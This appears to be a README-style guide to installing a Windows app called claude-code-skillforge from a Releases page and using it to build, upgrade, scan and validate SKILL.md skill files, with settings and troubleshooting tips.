Before installing, make sure your computer meets these minimum system needs:
- Windows 10 or newer (64-bit recommended)
- At least 4 GB of RAM
- 500 MB of free disk space
- Internet connection for syncing and marketplace searches

Open the claude-code-skillforge Releases page by clicking the link above or pasting it into your browser.

Look for the latest release at the top of the page. It will usually be labeled with the newest date or version number.

Under the latest release, find the Windows installer file. This will have a name ending with
.exe. Example:claude-code-skillforge-setup.exe. -
Click the
.exefile to start downloading. Depending on your browser, you might see the file appear near the bottom or top of your screen. -
After download finishes, open the file. You may need to allow your computer to run the file if a security warning appears.

Follow the installation steps on the screen:
- Choose the folder where you want the app installed (the default usually works fine)
- Agree to the terms if prompted
- Wait for the installation to complete

When the installer finishes, look for the claude-code-skillforge icon on your desktop or in the Start menu.

Click the icon to open the program.

Open claude-code-skillforge from your desktop or Start menu.

Use the File menu to create a new skill or open an existing SKILL.md file.

The main window shows your skill with options to build, upgrade, scan, or validate.

To upgrade your skill:
- Click the Upgrade button
- The app will update your file using the latest guidelines

To scan for errors:
- Select the Scan option
- The app highlights issues and suggests fixes

To search the skill marketplace:
- Use the Marketplace tab
- Type keywords to find similar skill files or templates

Save your changes regularly by clicking Save.
You can customize how the app works:
- Sync Frequency: Choose how often the app updates best practices from the cloud.
- Scan Options: Decide which issues the scanner should check for.
- Marketplace Filters: Set filters to narrow search results by category or skill type.
- File Backup: Enable automatic backups when saving skill files.
Access settings from the Settings menu at the top.
- If the app does not start, ensure Windows is updated.
- Restart your computer if a download or install fails.
- Close other programs before launching claude-code-skillforge to avoid conflicts.
- If scanning does not find issues, verify you have opened a valid SKILL.md file.
- Check internet connection if syncing or marketplace search do not work.
